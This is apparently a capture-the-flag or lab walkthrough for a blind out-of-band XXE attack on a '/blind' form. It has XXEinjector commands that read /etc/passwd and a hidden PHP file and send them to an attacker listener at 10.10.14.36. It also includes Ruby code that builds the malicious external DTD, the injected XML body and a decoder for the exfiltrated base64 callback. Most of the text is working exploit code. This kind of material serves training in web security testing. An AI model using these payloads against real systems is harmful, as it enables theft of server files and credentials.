Blind Data Exfiltration
Use blind (out-of-band) data exfiltration against the '/blind' page to read the content of '/327a6c4304ad5938eaf0efb6cc3e53dc.php' and get the flag. The page gives no output from the XML it parses, so the file has to be sent back to a listener we control instead of being reflected in the response.
Form: http://10.129.202.84/blind/
Intercept the POST request after submitting the form
Remove the form inputs from the body and put the XXEINJECT marker at the end of the request; XXEinjector replaces that marker with its XML payload on every request it sends.
Copy to file > xxe.req
ruby XXEinjector.rb --host=10.10.14.36 --httpport=8000 --file=xxe.req --path=/etc/passwd --oob=http --phpfilter
The exfiltrated content of /etc/passwd is written under the Logs folder next to XXEinjector.rb. Confirm it decoded cleanly before moving on to the target file, since it proves the PHP filter wrapper and the HTTP callback both work.
Try to read /327a6c4304ad5938eaf0efb6cc3e53dc.php
ruby XXEinjector.rb --host=10.10.14.36 --httpport=8000 --file=xxe.req --path=/327a6c4304ad5938eaf0efb6cc3e53dc.php --oob=http --phpfilter
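To make clear what XXEinjector does behind --oob=http --phpfilter, the following is an added example (it is not XXEinjector's own code or the page's): it builds the external DTD the listener serves, the XML body that goes in place of the XXEINJECT marker, and the decode step the listener performs on the callback. The attacker host and port come from the notes above; the DTD filename xxe.dtd and the query parameter name d are assumptions, and the callback request line is constructed.

```ruby
# Added example, not XXEinjector's code: the three pieces of a blind,
# out-of-band XXE exfiltration through php://filter.
ATTACKER = "10.10.14.36"   # attacker listener from the notes above
PORT     = 8000

# 1. External DTD served by the attacker host (assumed URL: http://ATTACKER:PORT/xxe.dtd).
#    %file reads the target through php://filter so the content comes back as
#    base64 (no XML-breaking characters). %oob defines a second parameter entity
#    whose expansion makes the victim fetch our URL with the base64 in the query.
#    Parameter entity references inside entity values are only expanded in an
#    external DTD, which is why this part cannot live in the request itself.
def build_dtd(target_path, host = ATTACKER, port = PORT)
  <<~DTD
    <!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=#{target_path}">
    <!ENTITY % oob "<!ENTITY &#x25; exfil SYSTEM 'http://#{host}:#{port}/?d=%file;'>">
    %oob;
    %exfil;
  DTD
end

# 2. The XML body injected at the XXEINJECT marker. It only references the
#    remote DTD, so the request stays small and the file path is changed on
#    the listener side, not in the request.
def build_request_body(host = ATTACKER, port = PORT)
  <<~XML
    <?xml version="1.0"?>
    <!DOCTYPE root [
      <!ENTITY % remote SYSTEM "http://#{host}:#{port}/xxe.dtd">
      %remote;
    ]>
    <root/>
  XML
end

# 3. What the listener does with the callback: pull the d= parameter out of
#    the request line and base64-decode it. Returns nil for unrelated requests.
#    The entity is expanded literally into the URL, so '=' padding usually
#    arrives raw; '%3D' is handled in case a proxy encoded it.
def decode_callback(request_line)
  m = request_line.match(%r{\A(?:GET|POST)\s+/\?d=([A-Za-z0-9+/=%]+)})
  return nil unless m
  m[1].gsub("%3D", "=").unpack1("m0")   # "m0": strict base64, no line breaks
end

if __FILE__ == $0
  puts build_dtd("/etc/passwd")
  puts build_request_body
  # Constructed callback line, as the victim's PHP would send it:
  sample = "root:x:0:0:root:/root:/bin/bash\n"
  puts decode_callback("GET /?d=#{[sample].pack('m0')} HTTP/1.1")
end
```

Because the file path lives only in the served DTD, rerunning against /327a6c4304ad5938eaf0efb6cc3e53dc.php changes nothing in the request; that is why XXEinjector can reuse the same xxe.req and only take a new --path. The base64 wrapper also matters for the PHP target: reading a .php file through a plain file:// entity would make the parser choke on the <?php tag, whereas convert.base64-encode gives it one safe token.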